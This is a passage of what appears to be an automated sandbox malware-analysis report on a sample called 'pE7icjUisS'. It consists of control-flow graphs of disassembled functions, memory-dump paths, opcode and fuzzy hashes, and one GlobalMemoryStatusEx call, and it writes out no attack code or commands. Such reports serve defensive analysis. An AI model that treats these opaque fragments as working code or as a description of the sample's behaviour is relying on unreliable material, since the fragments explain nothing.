                                                  control_flow_graph 1511 626bcd8-626bcf1 1512 626bcf3-626bcf6 1511->1512 1513 626bd06-626bd09 1512->1513 1514 626bcf8 1512->1514 1515 626bf62-626bf6b 1513->1515 1516 626bd0f-626bd12 1513->1516 1517 626bcfe-626bd01 1514->1517 1518 626bf71-626bf7b 1515->1518 1519 626bd3a-626bd43 1515->1519 1520 626bd14-626bd30 1516->1520 1521 626bd35-626bd38 1516->1521 1517->1513 1523 626bf7c-626bfb3 1519->1523 1524 626bd49-626bd50 1519->1524 1520->1521 1521->1519 1522 626bd55-626bd58 1521->1522 1526 626bd62-626bd64 1522->1526 1527 626bd5a-626bd5f 1522->1527 1531 626bfb5-626bfb8 1523->1531 1524->1522 1528 626bd66 1526->1528 1529 626bd6b-626bd6e 1526->1529 1527->1526 1528->1529 1529->1512 1533 626bd70-626be24 1529->1533 1534 626bfbf-626bfc2 1531->1534 1535 626bfba-626bfbc 1531->1535 1652 626bf20-626bf44 1533->1652 1653 626be2a-626be35 1533->1653 1536 626bfc4-626bfc7 1534->1536 1537 626c00a-626c00d 1534->1537 1535->1534 1539 626bfe0-626bfe3 1536->1539 1540 626bfc9-626bfdb 1536->1540 1541 626bfe5-626bfe8 1537->1541 1542 626c00f 1537->1542 1539->1541 1544 626bffa-626bffd 1539->1544 1540->1539 1545 626c1a3-626c1de 1541->1545 1546 626bfee-626bff5 1541->1546 1547 626c014-626c017 1542->1547 1551 626c005-626c008 1544->1551 1552 626bfff-626c000 1544->1552 1559 626c1e0-626c1e3 1545->1559 1546->1544 1548 626c02a-626c02d 1547->1548 1549 626c019-626c01f 1547->1549 1557 626c045-626c048 1548->1557 1558 626c02f-626c03e 1548->1558 1553 626c025 1549->1553 1554 626c109-626c10f 1549->1554 1551->1537 1551->1547 1552->1551 1553->1548 1554->1545 1562 626c115-626c11c 1554->1562 1560 626c055-626c058 1557->1560 1561 626c04a-626c050 1557->1561 1558->1552 1570 626c040 1558->1570 1564 626c1e5-626c1fe 1559->1564 1565 626c203-626c206 1559->1565 1567 626c060-626c063 1560->1567 1568 626c05a-626c05b 1560->1568 1561->1560 1569 626c121-626c124 1562->1569 1564->1565 1571 626c21d-626c220 1565->1571 1572 626c208-626c216 1565->1572 1575 626c065-626c06b 1567->1575 1576 626c070-626c073 1567->1576 1568->1567 1573 626c126-626c130 1569->1573 1574 626c135-626c138 1569->1574 1570->1557 1577 626c222-626c23e 1571->1577 1578 626c243-626c246 1571->1578 1602 626c265-626c292 1572->1602 1603 626c218 1572->1603 1573->1574 1583 626c13a-626c156 1574->1583 1584 626c15b-626c15e 1574->1584 1575->1576 1581 626c075-626c077 1576->1581 1582 626c07a-626c07d 1576->1582 1577->1578 1588 626c253-626c255 1578->1588 1589 626c248-626c252 1578->1589 1581->1582 1582->1549 1585 626c07f-626c082 1582->1585 1583->1584 1586 626c160-626c17a 1584->1586 1587 626c17f-626c181 1584->1587 1592 626c084-626c0aa 1585->1592 1593 626c0af-626c0b2 1585->1593 1586->1587 1600 626c183 1587->1600 1601 626c188-626c18b 1587->1601 1596 626c257 1588->1596 1597 626c25c-626c25f 1588->1597 1592->1593 1605 626c0d7-626c0da 1593->1605 1606 626c0b4-626c0d0 1593->1606 1596->1597 1597->1559 1597->1602 1600->1601 1601->1531 1607 626c191-626c1a2 1601->1607 1628 626c421-626c426 1602->1628 1629 626c298-626c2ba 1602->1629 1603->1571 1608 626c104-626c107 1605->1608 1609 626c0dc-626c0ff 1605->1609 1606->1568 1625 626c0d2 1606->1625 1608->1554 1608->1569 1609->1608 1625->1605 1636 626c42b-626c435 1628->1636 1635 626c2c0-626c2c9 1629->1635 1629->1636 1635->1628 1637 626c2cf-626c2d7 1635->1637 1639 626c40d-626c419 1637->1639 1640 626c2dd-626c2f6 1637->1640 1639->1635 1641 626c41f 1639->1641 1646 626c403-626c408 1640->1646 1647 626c2fc-626c323 1640->1647 1641->1636 1646->1639 1647->1646 1655 626c329-626c351 1647->1655 1664 626bf46 1652->1664 1665 626bf4e 1652->1665 1658 626be37-626be3d 1653->1658 1659 626be4d-626bf1a call 6263ee0 1653->1659 1655->1646 1668 626c357-626c371 1655->1668 1662 626be41-626be43 1658->1662 1663 626be3f 1658->1663 1659->1652 1659->1653 1662->1659 1663->1659 1664->1665 1670 626bf4f 1665->1670 1668->1646 1673 626c377-626c393 1668->1673 1670->1670 1673->1646 1679 626c395-626c3b4 1673->1679 1679->1646 1684 626c3b6-626c401 call 6263ee0 1679->1684 1684->1639
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: afd5199c8e6c7aece8aec650b54b132990d1661464b7b8be64c7c2b4d0c18340
                                                  • Instruction ID: 2a983cac0c328e78f684ddc2417b491578d42a17495f03f93a3504d6742b367f
                                                  • Opcode Fuzzy Hash: afd5199c8e6c7aece8aec650b54b132990d1661464b7b8be64c7c2b4d0c18340
                                                  • Instruction Fuzzy Hash: 3722A330B102058FDB54EB69D494B6DB7F2EF88311F108569E806DB365DB75EC82CB91
                                                  Function 062656C0 Relevance: .5, Instructions: 474COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1925 62656c0-62656de 1926 62656e0-62656e3 1925->1926 1927 62656e5-62656ef 1926->1927 1928 62656f0-62656f3 1926->1928 1929 62656f5-6265703 1928->1929 1930 626570a-626570d 1928->1930 1938 6265766-626577c 1929->1938 1939 6265705 1929->1939 1931 6265730-6265733 1930->1931 1932 626570f-626572b 1930->1932 1934 6265754-6265756 1931->1934 1935 6265735-626574f 1931->1935 1932->1931 1936 626575d-6265760 1934->1936 1937 6265758 1934->1937 1935->1934 1936->1926 1936->1938 1937->1936 1944 6265997-62659a1 1938->1944 1945 6265782-626578b 1938->1945 1939->1930 1947 62659a2-62659d7 1945->1947 1948 6265791-62657ae 1945->1948 1951 62659d9-62659dc 1947->1951 1957 6265984-6265991 1948->1957 1958 62657b4-62657dc 1948->1958 1953 62659e2-62659ee 1951->1953 1954 6265a8f-6265a92 1951->1954 1959 62659f9-62659fb 1953->1959 1955 6265cbe-6265cc1 1954->1955 1956 6265a98-6265aa7 1954->1956 1960 6265ce4-6265ce6 1955->1960 1961 6265cc3-6265cdf 1955->1961 1973 6265ac6-6265b01 1956->1973 1974 6265aa9-6265ac4 1956->1974 1957->1944 1957->1945 1958->1957 1979 62657e2-62657eb 1958->1979 1962 6265a13-6265a1a 1959->1962 1963 62659fd-6265a03 1959->1963 1965 6265ced-6265cf0 1960->1965 1966 6265ce8 1960->1966 1961->1960 1970 6265a1c-6265a29 1962->1970 1971 6265a2b 1962->1971 1968 6265a07-6265a09 1963->1968 1969 6265a05 1963->1969 1965->1951 1975 6265cf6-6265cff 1965->1975 1966->1965 1968->1962 1969->1962 1977 6265a30-6265a32 1970->1977 1971->1977 1984 6265b07-6265b18 1973->1984 1985 6265c92-6265ca7 1973->1985 1974->1973 1980 6265a34-6265a37 1977->1980 1981 6265a49-6265a82 1977->1981 1979->1947 1986 62657f1-626580d 1979->1986 1980->1975 1981->1956 2005 6265a84-6265a8e 1981->2005 1992 6265b1e-6265b3b 1984->1992 1993 6265c7d-6265c8c 1984->1993 1985->1955 1994 6265972-626597e 1986->1994 1995 6265813-626583d call 6261ae0 1986->1995 1992->1993 2006 6265b41-6265c37 call 6263ee0 1992->2006 1993->1984 1993->1985 1994->1957 1994->1979 2009 6265843-626586b 1995->2009 2010 6265968-626596d 1995->2010 2058 6265c45 2006->2058 2059 6265c39-6265c43 2006->2059 2009->2010 2016 6265871-626589f 2009->2016 2010->1994 2016->2010 2022 62658a5-62658ae 2016->2022 2022->2010 2023 62658b4-62658e6 2022->2023 2031 62658f1-626590d 2023->2031 2032 62658e8-62658ec 2023->2032 2031->1994 2033 626590f-6265966 call 6263ee0 2031->2033 2032->2010 2034 62658ee 2032->2034 2033->1994 2034->2031 2060 6265c4a-6265c4c 2058->2060 2059->2060 2060->1993 2061 6265c4e-6265c53 2060->2061 2062 6265c55-6265c5f 2061->2062 2063 6265c61 2061->2063 2064 6265c66-6265c68 2062->2064 2063->2064 2064->1993 2065 6265c6a-6265c76 2064->2065 2065->1993
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6728d3a8fb34e988f4c4fee7f8116af84c67da9e6f04d5e6b5e19b3baa8f82b2
                                                  • Instruction ID: 0f550a3e26fc22d2e1ccc234146edbc68d26fa7f1fdf761ee4c5452cb45b92a5
                                                  • Opcode Fuzzy Hash: 6728d3a8fb34e988f4c4fee7f8116af84c67da9e6f04d5e6b5e19b3baa8f82b2
                                                  • Instruction Fuzzy Hash: 89029130B102158FDB54DB6AD99076EBBF2FF84314F148569E806AB395DB31ED82CB90
                                                  Function 0626DC00 Relevance: .3, Instructions: 337COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2606 626dc00-626dc22 2607 626dc86-626dc8d 2606->2607 2608 626dc24-626dc63 call 626d460 call 626d294 2606->2608 2617 626dc65 2608->2617 2618 626dc8e-626dcf5 2608->2618 2619 626dc6c-626dc7e 2617->2619 2628 626dcf7-626dcf9 2618->2628 2629 626dcfe-626dd0e 2618->2629 2619->2607 2630 626df9d-626dfa4 2628->2630 2631 626dd15-626dd25 2629->2631 2632 626dd10 2629->2632 2634 626df84-626df92 2631->2634 2635 626dd2b-626dd39 2631->2635 2632->2630 2638 626df94-626df98 call 6261ae0 2634->2638 2639 626dfa5-626e01e 2634->2639 2635->2639 2640 626dd3f 2635->2640 2638->2630 2640->2639 2642 626dd46-626dd58 2640->2642 2643 626de42-626de6a 2640->2643 2644 626dd83-626dda5 2640->2644 2645 626de6f-626de97 2640->2645 2646 626ddaa-626ddcb 2640->2646 2647 626df09-626df35 2640->2647 2648 626ddf6-626de17 2640->2648 2649 626df37-626df52 2640->2649 2650 626df54-626df76 2640->2650 2651 626ddd0-626ddf1 2640->2651 2652 626dede-626df04 2640->2652 2653 626de1c-626de3d 2640->2653 2654 626de9c-626ded9 2640->2654 2655 626dd5d-626dd7e 2640->2655 2656 626df78-626df82 2640->2656 2642->2630 2643->2630 2644->2630 2645->2630 2646->2630 2647->2630 2648->2630 2649->2630 2650->2630 2651->2630 2652->2630 2653->2630 2654->2630 2655->2630 2656->2630
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5ce2420d903279fc0cf1afa9470d14b9e38baeed6cbca0b528ed5f0d992e4f20
                                                  • Instruction ID: fb3a6644ffd7721d31f16bb63271b6ba3c514e2291aeddbb2ccf6280302e4e03
                                                  • Opcode Fuzzy Hash: 5ce2420d903279fc0cf1afa9470d14b9e38baeed6cbca0b528ed5f0d992e4f20
                                                  • Instruction Fuzzy Hash: 9CB1B074F143188FDB98AB75985427E7BA3AFC8700B15892EF806DB399DE34CC428791
                                                  Function 014D4A60 Relevance: .3, Instructions: 266COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2707 14d4a60-14d4ac6 2710 14d4ac8-14d4ad3 2707->2710 2711 14d4b10-14d4b12 2707->2711 2710->2711 2713 14d4ad5-14d4ae1 2710->2713 2712 14d4b14-14d4b2d 2711->2712 2719 14d4b2f-14d4b3b 2712->2719 2720 14d4b79-14d4b7b 2712->2720 2714 14d4b04-14d4b0e 2713->2714 2715 14d4ae3-14d4aed 2713->2715 2714->2712 2717 14d4aef 2715->2717 2718 14d4af1-14d4b00 2715->2718 2717->2718 2718->2718 2721 14d4b02 2718->2721 2719->2720 2722 14d4b3d-14d4b49 2719->2722 2723 14d4b7d-14d4b95 2720->2723 2721->2714 2724 14d4b6c-14d4b77 2722->2724 2725 14d4b4b-14d4b55 2722->2725 2730 14d4bdf-14d4be1 2723->2730 2731 14d4b97-14d4ba2 2723->2731 2724->2723 2726 14d4b59-14d4b68 2725->2726 2727 14d4b57 2725->2727 2726->2726 2729 14d4b6a 2726->2729 2727->2726 2729->2724 2732 14d4be3-14d4bfb 2730->2732 2731->2730 2733 14d4ba4-14d4bb0 2731->2733 2740 14d4bfd-14d4c08 2732->2740 2741 14d4c45-14d4c47 2732->2741 2734 14d4bd3-14d4bdd 2733->2734 2735 14d4bb2-14d4bbc 2733->2735 2734->2732 2736 14d4bbe 2735->2736 2737 14d4bc0-14d4bcf 2735->2737 2736->2737 2737->2737 2739 14d4bd1 2737->2739 2739->2734 2740->2741 2742 14d4c0a-14d4c16 2740->2742 2743 14d4c49-14d4cbc 2741->2743 2744 14d4c39-14d4c43 2742->2744 2745 14d4c18-14d4c22 2742->2745 2752 14d4cc2-14d4cd0 2743->2752 2744->2743 2747 14d4c24 2745->2747 2748 14d4c26-14d4c35 2745->2748 2747->2748 2748->2748 2749 14d4c37 2748->2749 2749->2744 2753 14d4cd9-14d4d39 2752->2753 2754 14d4cd2-14d4cd8 2752->2754 2761 14d4d49-14d4d4d 2753->2761 2762 14d4d3b-14d4d3f 2753->2762 2754->2753 2764 14d4d5d-14d4d61 2761->2764 2765 14d4d4f-14d4d53 2761->2765 2762->2761 2763 14d4d41 2762->2763 2763->2761 2767 14d4d71-14d4d75 2764->2767 2768 14d4d63-14d4d67 2764->2768 2765->2764 2766 14d4d55 2765->2766 2766->2764 2769 14d4d85-14d4d89 2767->2769 2770 14d4d77-14d4d7b 2767->2770 2768->2767 2771 14d4d69 2768->2771 2773 14d4d99-14d4d9d 2769->2773 2774 14d4d8b-14d4d8f 2769->2774 2770->2769 2772 14d4d7d 2770->2772 2771->2767 2772->2769 2776 14d4dad 2773->2776 2777 14d4d9f-14d4da3 2773->2777 2774->2773 2775 14d4d91-14d4d94 call 14d0ab8 2774->2775 2775->2773 2781 14d4dae 2776->2781 2777->2776 2779 14d4da5-14d4da8 call 14d0ab8 2777->2779 2779->2776 2781->2781
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce1766b349cc12d80ba1a516a8ebabd23699acb4fdf659029a29547f02849726
                                                  • Instruction ID: 086694e32db2012eb42f9badbe6e55e295f93d8c073a2e998beeee11a00517bd
                                                  • Opcode Fuzzy Hash: ce1766b349cc12d80ba1a516a8ebabd23699acb4fdf659029a29547f02849726
                                                  • Instruction Fuzzy Hash: F6B17070E003098FDF14CFA9D9957AEBBF2AF48714F18852AD415E77A4EB749842CB81
                                                  Function 014D3E48 Relevance: .2, Instructions: 238COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fded6d6fefe57ec40a33cf8a43c165c49a298a0f36778f076bc69f51a320db75
                                                  • Instruction ID: 253ab871671dde1457703ebe48958048ac4e4b960810cf02e7901241e88e53e3
                                                  • Opcode Fuzzy Hash: fded6d6fefe57ec40a33cf8a43c165c49a298a0f36778f076bc69f51a320db75
                                                  • Instruction Fuzzy Hash: 94914EB0E003099FDF15CFA9C9A579EBBF2BF48314F18812AE415A73A4DB749845CB91
                                                  Function 0626E167 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 626e167-626e1be 2 626e1c6-626e1f4 GlobalMemoryStatusEx 0->2 3 626e1f6-626e1fc 2->3 4 626e1fd-626e225 2->4 3->4
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(8B55054C), ref: 0626E1E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: c051003b3fb43229853fcd0abda1cdba21c0eafa8ed784bf6943192cf22911ce
                                                  • Instruction ID: 27db27f40f46a7eabdbbc933792f5e4af2eaba3b2a57e9f6e50d16dd3f298c74
                                                  • Opcode Fuzzy Hash: c051003b3fb43229853fcd0abda1cdba21c0eafa8ed784bf6943192cf22911ce
                                                  • Instruction Fuzzy Hash: 0D216AB5C002599FCB10CF9AC444BDEFBF0AF48310F11816AE818A7340D7785941CFA1
                                                  Function 0626E180 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 7 626e180-626e1f4 GlobalMemoryStatusEx 9 626e1f6-626e1fc 7->9 10 626e1fd-626e225 7->10 9->10
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(8B55054C), ref: 0626E1E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 474abc558f5cf6dc85351835e416449b307cd8e251c2a302d564c97fa2b1d02e
                                                  • Instruction ID: 8b56856c4b730acdbf595067c82a17d89774a36e32e50b4e57f9fddec5f6bdaa
                                                  • Opcode Fuzzy Hash: 474abc558f5cf6dc85351835e416449b307cd8e251c2a302d564c97fa2b1d02e
                                                  • Instruction Fuzzy Hash: 941123B1C0025A9BCB10DF9AC845BDEFBF4AF48320F11816AE818A7240D778A941CFA1
                                                  Function 014D7990 Relevance: .6, Instructions: 559COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1704 14d7990-14d7992 1705 14d7994 1704->1705 1706 14d7996-14d799e 1704->1706 1705->1706 1707 14d79a0-14d79a1 1706->1707 1708 14d79a2-14d79a7 1706->1708 1707->1708 1709 14d79a9-14d79ac 1708->1709 1710 14d79ae-14d79d4 1709->1710 1711 14d79d9-14d79dc 1709->1711 1710->1711 1712 14d79de-14d7a04 1711->1712 1713 14d7a09-14d7a0c 1711->1713 1712->1713 1714 14d7a0e-14d7a34 1713->1714 1715 14d7a39-14d7a3c 1713->1715 1714->1715 1717 14d7a3e-14d7a64 1715->1717 1718 14d7a69-14d7a6c 1715->1718 1717->1718 1720 14d7a6e-14d7a94 1718->1720 1721 14d7a99-14d7a9c 1718->1721 1720->1721 1724 14d7a9e-14d7ac4 1721->1724 1725 14d7ac9-14d7acc 1721->1725 1724->1725 1728 14d7ace-14d7af4 1725->1728 1729 14d7af9-14d7afc 1725->1729 1728->1729 1733 14d7afe-14d7b24 1729->1733 1734 14d7b29-14d7b2c 1729->1734 1733->1734 1738 14d7b2e-14d7b54 1734->1738 1739 14d7b59-14d7b5c 1734->1739 1738->1739 1743 14d7b5e-14d7b84 1739->1743 1744 14d7b89-14d7b8c 1739->1744 1743->1744 1748 14d7b8e-14d7bb4 1744->1748 1749 14d7bb9-14d7bbc 1744->1749 1748->1749 1753 14d7bbe-14d7be4 1749->1753 1754 14d7be9-14d7bec 1749->1754 1753->1754 1758 14d7bee-14d7c14 1754->1758 1759 14d7c19-14d7c1c 1754->1759 1758->1759 1763 14d7c1e-14d7c44 1759->1763 1764 14d7c49-14d7c4c 1759->1764 1763->1764 1768 14d7c4e-14d7c74 1764->1768 1769 14d7c79-14d7c7c 1764->1769 1768->1769 1773 14d7c7e-14d7ca4 1769->1773 1774 14d7ca9-14d7cac 1769->1774 1773->1774 1778 14d7cae-14d7cd4 1774->1778 1779 14d7cd9-14d7cdc 1774->1779 1778->1779 1783 14d7cde-14d7d04 1779->1783 1784 14d7d09-14d7d0c 1779->1784 1783->1784 1788 14d7d0e-14d7d34 1784->1788 1789 14d7d39-14d7d3c 1784->1789 1788->1789 1793 14d7d3e-14d7d64 1789->1793 1794 14d7d69-14d7d6c 1789->1794 1793->1794 1798 14d7d6e-14d7d94 1794->1798 1799 14d7d99-14d7d9c 1794->1799 1798->1799 1803 14d7d9e-14d7dc4 1799->1803 1804 14d7dc9-14d7dcc 1799->1804 1803->1804 1808 14d7dce-14d7df4 1804->1808 1809 14d7df9-14d7dfc 1804->1809 1808->1809 1813 14d7dfe-14d7e24 1809->1813 1814 14d7e29-14d7e2c 1809->1814 1813->1814 1818 14d7e2e-14d7e54 1814->1818 1819 14d7e59-14d7e5c 1814->1819 1818->1819 1823 14d7e5e 1819->1823 1824 14d7e69-14d7e6c 1819->1824 1833 14d7e64 1823->1833 1828 14d7e6e-14d7e94 1824->1828 1829 14d7e99-14d7e9c 1824->1829 1828->1829 1836 14d7e9e-14d7ec4 1829->1836 1837 14d7ec9-14d7ecc 1829->1837 1833->1824 1836->1837 1838 14d7ece-14d7ef4 1837->1838 1839 14d7ef9-14d7efc 1837->1839 1838->1839 1844 14d7efe-14d7f24 1839->1844 1845 14d7f29-14d7f2c 1839->1845 1844->1845 1847 14d7f3d-14d7f40 1845->1847 1848 14d7f2e-14d7f30 1845->1848 1853 14d7f6d-14d7f70 1847->1853 1854 14d7f42-14d7f68 1847->1854 1922 14d7f32 call 14d91d9 1848->1922 1923 14d7f32 call 14d91e8 1848->1923 1924 14d7f32 call 14d928b 1848->1924 1856 14d7f9d-14d7fa0 1853->1856 1857 14d7f72-14d7f98 1853->1857 1854->1853 1863 14d7fcd-14d7fd0 1856->1863 1864 14d7fa2-14d7fc8 1856->1864 1857->1856 1858 14d7f38 1858->1847 1866 14d7ffd-14d8000 1863->1866 1867 14d7fd2-14d7ff8 1863->1867 1864->1863 1871 14d802d-14d8030 1866->1871 1872 14d8002-14d8028 1866->1872 1867->1866 1875 14d805d-14d8060 1871->1875 1876 14d8032-14d8058 1871->1876 1872->1871 1879 14d807b-14d807e 1875->1879 1880 14d8062-14d8076 1875->1880 1876->1875 1887 14d80ab-14d80ae 1879->1887 1888 14d8080-14d80a6 1879->1888 1880->1879 1889 14d80cb-14d80ce 1887->1889 1890 14d80b0-14d80c6 1887->1890 1888->1887 1897 14d80fb-14d80fe 1889->1897 1898 14d80d0-14d80f6 1889->1898 1890->1889 1899 14d812b-14d812e 1897->1899 1900 14d8100-14d8126 1897->1900 1898->1897 1906 14d815b-14d815d 1899->1906 1907 14d8130-14d8156 1899->1907 1900->1899 1909 14d815f 1906->1909 1910 14d8164-14d8167 1906->1910 1907->1906 1909->1910 1910->1709 1915 14d816d-14d8173 1910->1915 1922->1858 1923->1858 1924->1858
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c7df9c6492d8e7f1cb3383c48902a922ce2342196599ec3ce5ffa8a151c1c30
                                                  • Instruction ID: 2881a7c1a879dcdffecef52f0b9dfee34d6710b1979bd5e6c083f38612821711
                                                  • Opcode Fuzzy Hash: 9c7df9c6492d8e7f1cb3383c48902a922ce2342196599ec3ce5ffa8a151c1c30
                                                  • Instruction Fuzzy Hash: 09125174B413128BDF29AB29E49422D76A2FBD9606B508A3FD105CF769CF31EC4687C1
                                                  Function 014D9768 Relevance: .4, Instructions: 359COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2284 14d9768-14d9782 2285 14d9784-14d9787 2284->2285 2286 14d9789-14d978c 2285->2286 2287 14d979b-14d979e 2285->2287 2290 14d9900-14d990a 2286->2290 2291 14d9792-14d9796 2286->2291 2288 14d97aa-14d97ad 2287->2288 2289 14d97a0-14d97a3 2287->2289 2293 14d97af-14d97b0 2288->2293 2294 14d97b5-14d97b8 2288->2294 2289->2286 2292 14d97a5 2289->2292 2298 14d990c 2290->2298 2299 14d990e-14d997b 2290->2299 2291->2287 2292->2288 2293->2294 2296 14d97bf-14d97c2 2294->2296 2297 14d97ba-14d97bc 2294->2297 2300 14d97c4-14d97de 2296->2300 2301 14d97e3-14d97e6 2296->2301 2297->2296 2298->2299 2339 14d9981-14d9983 2299->2339 2340 14d9a92-14d9a99 2299->2340 2300->2301 2302 14d97e8-14d9800 2301->2302 2303 14d9807-14d980a 2301->2303 2302->2293 2310 14d9802 2302->2310 2303->2289 2304 14d980c-14d980f 2303->2304 2307 14d9821-14d9824 2304->2307 2308 14d9811 2304->2308 2311 14d9846-14d9849 2307->2311 2312 14d9826-14d9841 2307->2312 2315 14d981a-14d981c 2308->2315 2310->2303 2316 14d9868-14d986b 2311->2316 2317 14d984b-14d9867 2311->2317 2312->2311 2315->2307 2318 14d986d-14d9873 2316->2318 2319 14d9878-14d987b 2316->2319 2318->2319 2322 14d987d-14d9880 2319->2322 2323 14d98f5-14d98ff 2319->2323 2325 14d98a1-14d98a4 2322->2325 2326 14d9882-14d989c 2322->2326 2330 14d98c4-14d98c7 2325->2330 2331 14d98a6-14d98bf 2325->2331 2326->2325 2332 14d98c9-14d98d8 2330->2332 2333 14d98e3-14d98e5 2330->2333 2331->2330 2332->2317 2345 14d98de 2332->2345 2337 14d98ec-14d98ef 2333->2337 2338 14d98e7 2333->2338 2337->2285 2337->2323 2338->2337 2393 14d9986 call 14d93ec 2339->2393 2394 14d9986 call 14d9518 2339->2394 2395 14d9986 call 14d9768 2339->2395 2396 14d9986 call 14d9716 2339->2396 2343 14d998c-14d9998 2347 14d999a-14d99a1 2343->2347 2348 14d99a3-14d99aa 2343->2348 2345->2333 2347->2348 2349 14d99ab-14d99d2 2347->2349 2353 14d99dc-14d99e3 2349->2353 2354 14d99d4-14d99db 2349->2354 2355 14d99e9-14d99ed 2353->2355 2356 14d9a9a-14d9aa0 2353->2356 2357 14d99ef-14d99f6 2355->2357 2358 14d99f7-14d9a60 2355->2358 2361 14d9a63-14d9a76 2356->2361 2362 14d9aa2 2356->2362 2358->2361 2371 14d9a78-14d9a7f 2361->2371 2372 14d9a86-14d9a8a 2361->2372 2363 14d9aa4 2362->2363 2364 14d9aa6 2362->2364 2363->2364 2365 14d9aa8 2364->2365 2366 14d9aaa 2364->2366 2365->2366 2369 14d9aac 2366->2369 2370 14d9aae-14d9acb 2366->2370 2369->2370 2373 14d9acd-14d9acf 2370->2373 2371->2372 2372->2340 2374 14d9ad6-14d9ad9 2373->2374 2375 14d9ad1 2373->2375 2374->2373 2376 14d9adb-14d9b17 call 14d0368 2374->2376 2375->2374 2381 14d9b1f-14d9b22 2376->2381 2382 14d9b19-14d9b1b 2376->2382 2384 14d9b69 2381->2384 2385 14d9b24-14d9b4e 2381->2385 2383 14d9b1d 2382->2383 2382->2384 2383->2385 2387 14d9b6e-14d9b72 2384->2387 2392 14d9b54-14d9b67 2385->2392 2388 14d9b7d 2387->2388 2389 14d9b74 2387->2389 2389->2388 2392->2387 2393->2343 2394->2343 2395->2343 2396->2343
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_14d0000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 030f8c9d9b3dcc51219f7f45744c63dd6996eb0796022fc858a3505eac667133
                                                  • Instruction ID: 84f43a46c0f7cb6c5b5f8bad61dd97373ec6aabb11919eebce6cbf0b4ea1d85e
                                                  • Opcode Fuzzy Hash: 030f8c9d9b3dcc51219f7f45744c63dd6996eb0796022fc858a3505eac667133
                                                  • Instruction Fuzzy Hash: E1D19E75A002058FDF14DFA9D8907AEBBB2FF88314F10856AE909DB3A5D771D841CB91
                                                  Function 014D93EC Relevance: .4, Instructions: 353COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3856214895.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
